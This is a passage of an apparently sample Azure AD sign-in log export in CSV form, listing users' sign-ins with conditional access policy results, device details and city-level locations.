'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:03,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",ada993e9-7277-4e26-b6a7-9ce229760200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ada993e9-7277-4e26-b6a7-9ce229760200,SigninLogs,Sucess,40.75891113,-73.97901917
+472,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:23.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,55ed0380-304b-4009-82ab-0a1d14aab9c7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",17ea6265-ad23-4765-8c42-0b9fc11f1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,17ea6265-ad23-4765-8c42-0b9fc11f1800,SigninLogs,Sucess,36.6404686,-78.26995087
+473,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:00.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e7c88425-f641-4425-a353-1cb058ff1814,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5a121923-a43a-49e3-acac-67d920c41900,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5a121923-a43a-49e3-acac-67d920c41900,SigninLogs,Sucess,50.6406517,5.572050095
+474,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:16.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,af6d99df-e5d0-4d03-aca9-ce4e4280be9a,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,Dynamics 365 Portal,bab47555-038a-4434-a931-96cc6091cdd7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",cab11a23-741d-4ba5-9c87-1055c4f02500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],{'errorCode': 0},CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cab11a23-741d-4ba5-9c87-1055c4f02500,SigninLogs,Sucess,47.68061829,-122.1869888
+475,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:48.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c7188f70-f4dd-4b1d-a319-76c7084b2bd1,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:48,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",9da4e503-60a4-4a4f-8364-398ec63f5800,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,9da4e503-60a4-4a4f-8364-398ec63f5800,SigninLogs,Sucess,32.32146072,34.85319901
+476,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:12.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c1f2e17e-30b6-4474-baa7-f2318e7976fa,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:01,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Edge 80.0.361', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",f0214e47-f9bb-4b81-aab4-2b719cda0000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f0214e47-f9bb-4b81-aab4-2b719cda0000,SigninLogs,Sucess,32.32146072,34.85319901
+477,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:16.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,38e91d01-944a-48f2-9e3e-e1fb26207244,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",b820b578-3403-4df9-9305-b26761041d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,b820b578-3403-4df9-9305-b26761041d00,SigninLogs,Sucess,33.7984581,-84.38828278
+478,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:35.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4fd694de-5895-4514-9729-2a675a82f669,Microsoft.aadiam,Microsoft.aadiam,,Anthony Roman,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:11,"{'operatingSystem': 'Windows 10', 'deviceId': '0b9d11a7-b5c6-48c5-898e-b62fde94f3b0', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-II6P5U4', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",638d0e13-8d1d-4e17-a207-4d2d54940200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -75.16385650634764, 'latitude': 39.94686126708984}, 'state': 'Pennsylvania', 'city': 'Philadelphia'}",none,none,none,none,[],{'errorCode': 0},Anthony Roman,2b2e5983-18b7-4b63-b87e-34de934cc906,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,638d0e13-8d1d-4e17-a207-4d2d54940200,SigninLogs,Sucess,39.94686127,-75.16385651
+479,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:32.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f17146f0-6c6d-42dc-833a-9f316f136ccf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': 